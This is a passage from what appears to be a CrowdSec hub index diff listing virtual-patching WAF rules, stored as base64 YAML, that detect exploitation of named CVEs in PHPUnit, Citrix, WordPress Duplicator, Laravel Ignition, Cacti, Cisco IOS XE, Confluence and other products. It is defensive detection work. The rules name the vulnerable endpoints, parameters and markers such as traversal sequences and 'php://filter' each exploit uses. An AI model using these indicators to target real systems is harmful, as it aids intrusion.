+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "6e5549b580c3a35315a6660a2904eafd3b463141d95f1ad2d5d606d55eb0b046",
+ "deprecated": false
+ }
+ },
+ "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMTctOTg0MQpkZXNjcmlwdGlvbjogIkRldGVjdCBDVkUtMjAxNy05ODQxIGV4cGxvaXRzICIKcnVsZXM6CiAgLSBhbmQ6CiAgICAtIHpvbmVzOgogICAgICAtIFVSSQogICAgICB0cmFuc2Zvcm06CiAgICAgIC0gbG93ZXJjYXNlCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVuZHNXaXRoCiAgICAgICAgdmFsdWU6IC91dGlsL3BocC9ldmFsLXN0ZGluLnBocApsYWJlbHM6CiAgdHlwZTogZXhwbG9pdAogIHNlcnZpY2U6IGh0dHAKICBjb25maWRlbmNlOiAzCiAgc3Bvb2ZhYmxlOiAwCiAgYmVoYXZpb3I6ICJodHRwOmV4cGxvaXQiCiAgbGFiZWw6ICJQSFBVbml0IFJDRSAoQ1ZFLTIwMTctOTg0MSkiCiAgY2xhc3NpZmljYXRpb246CiAgIC0gY3ZlLkNWRS0yMDE3LTk4NDEKICAgLSBhdHRhY2suVDE1OTUKICAgLSBhdHRhY2suVDExOTAKICAgLSBjd2UuQ1dFLTk0",
+ "description": "Detect CVE-2017-9841 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2017-9841",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-94"
+ ],
+ "confidence": 3,
+ "label": "PHPUnit RCE (CVE-2017-9841)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2019-12989": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2019-12989.yaml",
+ "version": "0.2",
+ "versions": {
+ "0.1": {
+ "digest": "a2f681cb8b762e33a66e63343a9fce32d5416438322ec376946ff78428543714",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "a8137b302f6fa55456dcf9cb7e9e9ba11dd878f0b91c90b3910fa4af397e0218",
+ "deprecated": false
+ }
+ },
+ "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMTktMTI5ODkKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMTktMTI5ODkgZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gTUVUSE9ECiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVxdWFscwogICAgICAgIHZhbHVlOiBQT1NUCiAgICAtIHpvbmVzOgogICAgICAtIFVSSQogICAgICB0cmFuc2Zvcm06CiAgICAgIC0gbG93ZXJjYXNlCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVuZHNXaXRoCiAgICAgICAgdmFsdWU6IC9zZHdhbi9uaXRyby92MS9jb25maWcvZ2V0X3BhY2thZ2VfZmlsZQogICAgLSB6b25lczoKICAgICAgLSBBUkdTCiAgICAgIHZhcmlhYmxlczoKICAgICAgIC0gYWN0aW9uCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZXF1YWxzCiAgICAgICAgdmFsdWU6ICJmaWxlX2Rvd25sb2FkIgogICAgLSB6b25lczoKICAgICAgLSBCT0RZX0FSR1MKICAgICAgdmFyaWFibGVzOgogICAgICAgLSBqc29uLmdldF9wYWNrYWdlX2ZpbGUuc2l0ZV9uYW1lCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGxpYmluamVjdGlvblNRTApsYWJlbHM6CiAgdHlwZTogZXhwbG9pdAogIHNlcnZpY2U6IGh0dHAKICBjb25maWRlbmNlOiAzCiAgc3Bvb2ZhYmxlOiAwCiAgYmVoYXZpb3I6ICJodHRwOmV4cGxvaXQiCiAgbGFiZWw6ICJjaXRyaXggU1FMaSAoQ1ZFLTIwMTktMTI5ODkpIgogIGNsYXNzaWZpY2F0aW9uOgogICAtIGN2ZS5DVkUtMjAxOS0xMjk4OQogICAtIGF0dGFjay5UMTU5NQogICAtIGF0dGFjay5UMTE5MAogICAtIGN3ZS5DV0UtODk=",
+ "description": "Detect CVE-2019-12989 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2019-12989",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-89"
+ ],
+ "confidence": 3,
+ "label": "citrix SQLi (CVE-2019-12989)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2020-11738": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2020-11738.yaml",
+ "version": "0.4",
+ "versions": {
+ "0.1": {
+ "digest": "4760198ce14851e3387470bc0270f662b58aa32b8ef1f4217af6818e4f0cedbe",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "d939fd479841838064eb205911dd20f35a8070eea2734cf4e0c7bd0c2b5444fe",
+ "deprecated": false
+ },
+ "0.3": {
+ "digest": "d82023967b6e1516519bf0adf7ae5e4d192c19039434267cffd73058f550c2fc",
+ "deprecated": false
+ },
+ "0.4": {
+ "digest": "e73f8dadfeb909e98e3609d0cc098533f2c0351503cabebdf92a43f9d1b3e94c",
+ "deprecated": false
+ }
+ },
+ "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjAtMTE3MzgKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMjAtMTE3MzggZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gVVJJCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZW5kc1dpdGgKICAgICAgICB2YWx1ZTogL3dwLWFkbWluL2FkbWluLWFqYXgucGhwCiAgICAtIHpvbmVzOgogICAgICAtIEFSR1MKICAgICAgdmFyaWFibGVzOgogICAgICAgIC0gYWN0aW9uCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVxdWFscwogICAgICAgIHZhbHVlOiBkdXBsaWNhdG9yX2Rvd25sb2FkCiAgICAtIHpvbmVzOgogICAgICAtIEFSR1MKICAgICAgdmFyaWFibGVzOgogICAgICAgIC0gZmlsZQogICAgICBtYXRjaDoKICAgICAgICB0eXBlOiBjb250YWlucwogICAgICAgIHZhbHVlOiAiLi4iCmxhYmVsczoKICB0eXBlOiBleHBsb2l0CiAgc2VydmljZTogaHR0cAogIGNvbmZpZGVuY2U6IDMKICBzcG9vZmFibGU6IDAKICBiZWhhdmlvcjogImh0dHA6ZXhwbG9pdCIKICBsYWJlbDogIldvcmRwcmVzcyBTbmFwIENyZWVrIER1cGxpY2F0b3IgKENWRS0yMDIwLTExNzM4KSIKICBjbGFzc2lmaWNhdGlvbjoKICAgLSBjdmUuQ1ZFLTIwMjAtMTE3MzgKICAgLSBhdHRhY2suVDE1OTUKICAgLSBhdHRhY2suVDExOTAKICAgLSBjd2UuQ1dFLTIy",
+ "description": "Detect CVE-2020-11738 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2020-11738",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-22"
+ ],
+ "confidence": 3,
+ "label": "Wordpress Snap Creek Duplicator (CVE-2020-11738)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2021-22941": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2021-22941.yaml",
+ "version": "0.2",
+ "versions": {
+ "0.1": {
+ "digest": "994975ada2914e56168b94db4acb5f28293673fcf824d35619d5e35539cf8052",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "0057a096e2d27ce5264d9481dd073bf97d7ef9a6b7e3e11785cfd8dde880db56",
+ "deprecated": false
+ }
+ },
+ "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjEtMjI5NDEKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMjEtMjI5NDEgZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gTUVUSE9ECiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVxdWFscwogICAgICAgIHZhbHVlOiBQT1NUCiAgICAtIHpvbmVzOgogICAgICAtIFVSSQogICAgICB0cmFuc2Zvcm06CiAgICAgIC0gbG93ZXJjYXNlCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVuZHNXaXRoCiAgICAgICAgdmFsdWU6IC91cGxvYWQuYXNweAogICAgLSB6b25lczoKICAgICAgLSBBUkdTCiAgICAgIHZhcmlhYmxlczoKICAgICAgIC0gdXBsb2FkaWQKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogY29udGFpbnMKICAgICAgICB2YWx1ZTogIi4uIgpsYWJlbHM6CiAgdHlwZTogZXhwbG9pdAogIHNlcnZpY2U6IGh0dHAKICBjb25maWRlbmNlOiAzCiAgc3Bvb2ZhYmxlOiAwCiAgYmVoYXZpb3I6ICJodHRwOmV4cGxvaXQiCiAgbGFiZWw6ICJDaXRyaXggUkNFIChDVkUtMjAyMS0yMjk0MSkiCiAgY2xhc3NpZmljYXRpb246CiAgIC0gY3ZlLkNWRS0yMDIxLTIyOTQxCiAgIC0gYXR0YWNrLlQxNTk1CiAgIC0gYXR0YWNrLlQxMTkwCiAgIC0gY3dlLkNXRS0yODQ=",
+ "description": "Detect CVE-2021-22941 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2021-22941",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-284"
+ ],
+ "confidence": 3,
+ "label": "Citrix RCE (CVE-2021-22941)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2021-3129": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2021-3129.yaml",
+ "version": "0.2",
+ "versions": {
+ "0.1": {
+ "digest": "78803a49055ed71b353ddf43560d700d0b64ebfb172ef6705457f793a9f37b34",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "b155e9bbe64b4b44f3c98617c4b3bfedaadcce147e0685290e0d7a8dbdf47108",
+ "deprecated": false
+ }
+ },
+ "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjEtMzEyOQpkZXNjcmlwdGlvbjogIkRldGVjdCBDVkUtMjAyMS0zMTI5IGV4cGxvaXRzICIKcnVsZXM6CiAgLSBhbmQ6CiAgICAtIHpvbmVzOgogICAgICAtIFVSSQogICAgICB0cmFuc2Zvcm06CiAgICAgIC0gbG93ZXJjYXNlCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVuZHNXaXRoCiAgICAgICAgdmFsdWU6IC9faWduaXRpb24vZXhlY3V0ZS1zb2x1dGlvbgogICAgLSB6b25lczoKICAgICAgLSBCT0RZX0FSR1MKICAgICAgdmFyaWFibGVzOgogICAgICAtIGpzb24ucGFyYW1ldGVycy52aWV3RmlsZQogICAgICBtYXRjaDoKICAgICAgICB0eXBlOiByZWdleAogICAgICAgIHZhbHVlOiAicGhwOi8vZmlsdGVyfHBoYXI6Ly8iCmxhYmVsczoKICB0eXBlOiBleHBsb2l0CiAgc2VydmljZTogaHR0cAogIGNvbmZpZGVuY2U6IDMKICBzcG9vZmFibGU6IDAKICBiZWhhdmlvcjogImh0dHA6ZXhwbG9pdCIKICBsYWJlbDogIkxhcmF2ZWwgd2l0aCBJZ25pdGlvbiA8PSB2OC40LjIgRGVidWcgTW9kZSAtIFJlbW90ZSBDb2RlIEV4ZWN1dGlvbiAoQ1ZFLTIwMjEtMzEyOSkiCiAgY2xhc3NpZmljYXRpb246CiAgIC0gY3ZlLkNWRS0yMDIxLTMxMjkKICAgLSBhdHRhY2suVDE1OTUKICAgLSBhdHRhY2suVDExOTAKICAgLSBjd2UuQ1dFLTk4",
+ "description": "Detect CVE-2021-3129 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2021-3129",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-98"
+ ],
+ "confidence": 3,
+ "label": "Laravel with Ignition \u003c= v8.4.2 Debug Mode - Remote Code Execution (CVE-2021-3129)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2022-27926": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2022-27926.yaml",
+ "version": "0.2",
+ "versions": {
+ "0.1": {
+ "digest": "d96237a7ed02eb7aa9df45a684b5cef8f5145e857d10b5260373739668ad63f5",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "ba56077560152e4dd0e06c1bc1e6522515142b0ea7a27dff2c0ea289ddaee174",
+ "deprecated": false
+ }
+ },
+ "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjItMjc5MjYKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMjItMjc5MjYgZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gVVJJCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZW5kc1dpdGgKICAgICAgICB2YWx1ZTogL3B1YmxpYy9lcnJvci5qc3AKICAgIC0gem9uZXM6CiAgICAgIC0gQVJHUwogICAgICB2YXJpYWJsZXM6CiAgICAgIC0gZXJyQ29kZQogICAgICB0cmFuc2Zvcm06CiAgICAgIC0gbG93ZXJjYXNlCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGxpYmluamVjdGlvblhTUwpsYWJlbHM6CiAgdHlwZTogZXhwbG9pdAogIHNlcnZpY2U6IGh0dHAKICBjb25maWRlbmNlOiAzCiAgc3Bvb2ZhYmxlOiAwCiAgYmVoYXZpb3I6ICJodHRwOmV4cGxvaXQiCiAgbGFiZWw6ICJaaW1icmEgQ29sbGFib3JhdGlvbiAoWkNTKSAtIENyb3NzIFNpdGUgU2NyaXB0aW5nIChDVkUtMjAyMi0yNzkyNikiCiAgY2xhc3NpZmljYXRpb246CiAgIC0gY3ZlLkNWRS0yMDIyLTI3OTI2CiAgIC0gYXR0YWNrLlQxNTk1CiAgIC0gYXR0YWNrLlQxMTkwCiAgIC0gY3dlLkNXRS03OQ==",
+ "description": "Detect CVE-2022-27926 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2022-27926",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-79"
+ ],
+ "confidence": 3,
+ "label": "Zimbra Collaboration (ZCS) - Cross Site Scripting (CVE-2022-27926)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2022-35914": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2022-35914.yaml",
+ "version": "0.3",
+ "versions": {
+ "0.1": {
+ "digest": "6a04ea781b27eb568a1752e3e310ef59532f803fed829010fb5cf76225454bc5",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "ef4c9225bcfcc942fa5db2568a99af628cf578249b4a7477e0889f16d3ef4111",
+ "deprecated": false
+ },
+ "0.3": {
+ "digest": "e1213758c850424b37cb6ff6360fc1e1a2f12af9284d77766b06ee8c58679656",
+ "deprecated": false
+ }
+ },
+ "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjItMzU5MTQKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMjItMzU5MTQgZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gVVJJCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZW5kc1dpdGgKICAgICAgICB2YWx1ZTogL3ZlbmRvci9odG1sYXdlZC9odG1sYXdlZC9odG1sYXdlZHRlc3QucGhwCgpsYWJlbHM6CiAgdHlwZTogZXhwbG9pdAogIHNlcnZpY2U6IGh0dHAKICBjb25maWRlbmNlOiAzCiAgc3Bvb2ZhYmxlOiAwCiAgYmVoYXZpb3I6ICJodHRwOmV4cGxvaXQiCiAgbGFiZWw6ICJHTFBJIDw9MTAuMC4yIC0gUmVtb3RlIENvbW1hbmQgRXhlY3V0aW9uIChDVkUtMjAyMi0zNTkxNCkiCiAgY2xhc3NpZmljYXRpb246CiAgIC0gY3ZlLkNWRS0yMDIyLTM1OTE0CiAgIC0gYXR0YWNrLlQxNTk1CiAgIC0gYXR0YWNrLlQxMTkwCiAgIC0gY3dlLkNXRS03NA==",
+ "description": "Detect CVE-2022-35914 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2022-35914",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-74"
+ ],
+ "confidence": 3,
+ "label": "GLPI \u003c=10.0.2 - Remote Command Execution (CVE-2022-35914)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2022-44877": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2022-44877.yaml",
+ "version": "0.1",
+ "versions": {
+ "0.1": {
+ "digest": "3c6baf947b513098784bb4cb9d03c2e19483dd48a7660db55ee77872dd903132",
+ "deprecated": false
+ }
+ },
+ "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjItNDQ4NzcKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMjItNDQ4NzcgZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gVVJJCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZW5kc1dpdGgKICAgICAgICB2YWx1ZTogL2xvZ2luL2luZGV4LnBocAogICAgLSB6b25lczoKICAgICAgLSBBUkdTCiAgICAgIHZhcmlhYmxlczoKICAgICAgLSBsb2dpbgogICAgICBtYXRjaDoKICAgICAgICB0eXBlOiByZWdleAogICAgICAgIHZhbHVlOiAiW15hLXpBLVowLTlfLi1dKyIKbGFiZWxzOgogIHR5cGU6IGV4cGxvaXQKICBzZXJ2aWNlOiBodHRwCiAgY29uZmlkZW5jZTogMwogIHNwb29mYWJsZTogMAogIGJlaGF2aW9yOiAiaHR0cDpleHBsb2l0IgogIGxhYmVsOiAiQ2VudE9TIFdlYiBQYW5lbCA3IFJDRSAoQ1ZFLTIwMjItNDQ4NzcpIgogIGNsYXNzaWZpY2F0aW9uOgogICAtIGN2ZS5DVkUtMjAyMi00NDg3NwogICAtIGF0dGFjay5UMTU5NQogICAtIGF0dGFjay5UMTE5MAogICAtIGN3ZS5DV0UtNzg=",
+ "description": "Detect CVE-2022-44877 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2022-44877",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-78"
+ ],
+ "confidence": 3,
+ "label": "CentOS Web Panel 7 RCE (CVE-2022-44877)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2022-46169": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2022-46169.yaml",
+ "version": "0.3",
+ "versions": {
+ "0.1": {
+ "digest": "e251805a453d65934e5794cbb96ce34179ce20981a123103d814afdcbb788d00",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "6d2c89d06aefeacf14816f1cc755365056efcdba79265a0bb587033ca5790962",
+ "deprecated": false
+ },
+ "0.3": {
+ "digest": "00ad3b04df93d2ea077b69ecfcc1156ad0262005ab9915b740f6fb0c08fe86a1",
+ "deprecated": false
+ }
+ },
+ "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjItNDYxNjkKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMjItNDYxNjkgZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gVVJJCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZW5kc1dpdGgKICAgICAgICB2YWx1ZTogL3JlbW90ZV9hZ2VudC5waHAKICAgIC0gem9uZXM6CiAgICAgIC0gQVJHUwogICAgICB2YXJpYWJsZXM6CiAgICAgIC0gcG9sbGVyX2lkCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IHJlZ2V4CiAgICAgICAgdmFsdWU6ICJbXmEtekEtWjAtOV9dIgoKbGFiZWxzOgogIHR5cGU6IGV4cGxvaXQKICBzZXJ2aWNlOiBodHRwCiAgY29uZmlkZW5jZTogMwogIHNwb29mYWJsZTogMAogIGJlaGF2aW9yOiAiaHR0cDpleHBsb2l0IgogIGxhYmVsOiAiQ2FjdGkgPD0xLjIuMjIgLSBSZW1vdGUgQ29tbWFuZCBJbmplY3Rpb24gKENWRS0yMDIyLTQ2MTY5KSIKICBjbGFzc2lmaWNhdGlvbjoKICAgLSBjdmUuQ1ZFLTIwMjItNDYxNjkKICAgLSBhdHRhY2suVDE1OTUKICAgLSBhdHRhY2suVDExOTAKICAgLSBjd2UuQ1dFLTc0CiAgIC0gY3dlLkNXRS03NwogICAtIGN3ZS5DV0UtNzgKICAgLSBjd2UuQ1dFLTg2Mw==",
+ "description": "Detect CVE-2022-46169 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2022-46169",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-74",
+ "cwe.CWE-77",
+ "cwe.CWE-78",
+ "cwe.CWE-863"
+ ],
+ "confidence": 3,
+ "label": "Cacti \u003c=1.2.22 - Remote Command Injection (CVE-2022-46169)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2023-20198": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-20198.yaml",
+ "version": "0.4",
+ "versions": {
+ "0.1": {
+ "digest": "100fe7c75a8b557d6ad35bc8712b996d9366631dda64d8a72e245293773ef2ae",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "4ed8476a931d3b45b210669ccab401d736bc765cc21ea02ed8fbddc21e6598ca",
+ "deprecated": false
+ },
+ "0.3": {
+ "digest": "eedd4555f876c459d0a17950f3b1311404b44d248b789221fddf73054e429bc0",
+ "deprecated": false
+ },
+ "0.4": {
+ "digest": "4d5339081ffa687619f13b3480984e056f64cab397154c187470ef1144a5fed3",
+ "deprecated": false
+ }
+ },
+ "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtMjAxOTgKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMjMtMjAxOTggZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gVVJJCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZW5kc1dpdGgKICAgICAgICB2YWx1ZTogLyU3N2VidWlfd3NtYV9odHRwcwogICAgLSB6b25lczoKICAgICAgLSBNRVRIT0QKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZXF1YWxzCiAgICAgICAgdmFsdWU6IFBPU1QKbGFiZWxzOgogIHR5cGU6IGV4cGxvaXQKICBzZXJ2aWNlOiBodHRwCiAgY29uZmlkZW5jZTogMwogIHNwb29mYWJsZTogMAogIGJlaGF2aW9yOiAiaHR0cDpleHBsb2l0IgogIGxhYmVsOiAiQ0lTQ08gSU9TIFhFIGFjY291bnQgY3JlYXRpb24gKENWRS0yMDIzLTIwMTk4KSIKICBjbGFzc2lmaWNhdGlvbjoKICAgLSBjdmUuQ1ZFLTIwMjMtMjAxOTgKICAgLSBhdHRhY2suVDE1OTUKICAgLSBhdHRhY2suVDExOTAKICAgLSBjd2UuQ1dFLTI4Nw==",
+ "description": "Detect CVE-2023-20198 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2023-20198",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-287"
+ ],
+ "confidence": 3,
+ "label": "CISCO IOS XE account creation (CVE-2023-20198)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2023-22515": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-22515.yaml",
+ "version": "0.3",
+ "versions": {
+ "0.1": {
+ "digest": "dc6fc69ee52353cef3ea5563dbccd5b73dae0924e0bf13e38550768a23eeee8c",
+ "deprecated": false
+ },
+ "0.2": {
+ "digest": "bf313622a8c6b00bdaf421bb0766c1a0d077aaff8db50c32c4b1090dbbbf0fb9",
+ "deprecated": false
+ },
+ "0.3": {
+ "digest": "16d7f6ff1913304df2a270b3a27ba5d1165be8e3c7978489cfb9338875bb4d42",
+ "deprecated": false
+ }
+ },
+ "content": "bmFtZTogY3Jvd2RzZWN1cml0eS92cGF0Y2gtQ1ZFLTIwMjMtMjI1MTUKZGVzY3JpcHRpb246ICJEZXRlY3QgQ1ZFLTIwMjMtMjI1MTUgZXhwbG9pdHMgIgpydWxlczoKICAtIGFuZDoKICAgIC0gem9uZXM6CiAgICAgIC0gVVJJCiAgICAgIHRyYW5zZm9ybToKICAgICAgLSBsb3dlcmNhc2UKICAgICAgbWF0Y2g6CiAgICAgICAgdHlwZTogZW5kc1dpdGgKICAgICAgICB2YWx1ZTogL3NldHVwL3NldHVwYWRtaW5pc3RyYXRvci5hY3Rpb24KICAgIC0gem9uZXM6CiAgICAgIC0gTUVUSE9ECiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVxdWFscwogICAgICAgIHZhbHVlOiBQT1NUCiAgICAtIHpvbmVzOgogICAgICAtIEhFQURFUlMKICAgICAgdmFyaWFibGVzOgogICAgICAgLSB4LWF0bGFzc2lhbi10b2tlbgogICAgICB0cmFuc2Zvcm06CiAgICAgIC0gbG93ZXJjYXNlCiAgICAgIG1hdGNoOgogICAgICAgIHR5cGU6IGVxdWFscwogICAgICAgIHZhbHVlOiAibm8tY2hlY2siCmxhYmVsczoKICB0eXBlOiBleHBsb2l0CiAgc2VydmljZTogaHR0cAogIGNvbmZpZGVuY2U6IDMKICBzcG9vZmFibGU6IDAKICBiZWhhdmlvcjogImh0dHA6ZXhwbG9pdCIKICBsYWJlbDogIkF0bGFzc2lhbiBDb25mbHVlbmNlIFByaXZlc2MgKENWRS0yMDIzLTIyNTE1KSIKICBjbGFzc2lmaWNhdGlvbjoKICAgLSBjdmUuQ1ZFLTIwMjMtMjI1MTUKICAgLSBhdHRhY2suVDE1OTUKICAgLSBhdHRhY2suVDExOTAKICAgLSBjd2UuQ1dFLTI4NA==",
+ "description": "Detect CVE-2023-22515 exploits ",
+ "author": "crowdsecurity",
+ "labels": {
+ "behavior": "http:exploit",
+ "classification": [
+ "cve.CVE-2023-22515",
+ "attack.T1595",
+ "attack.T1190",
+ "cwe.CWE-284"
+ ],
+ "confidence": 3,
+ "label": "Atlassian Confluence Privesc (CVE-2023-22515)",
+ "service": "http",
+ "spoofable": 0,
+ "type": "exploit"
+ }
+ },
+ "crowdsecurity/vpatch-CVE-2023-24489": {
+ "path": "appsec-rules/crowdsecurity/vpatch-CVE-2023-24489.yaml",
+ "version": "0.1",
+ "versions": {
+ "0.1": {
+ "digest": "c7ec7c49ee24ba7ba855e3ae256ec2d128b51c7771d676dc150aa3cc060ca785",
+ "deprecated": false
+ }
+ },
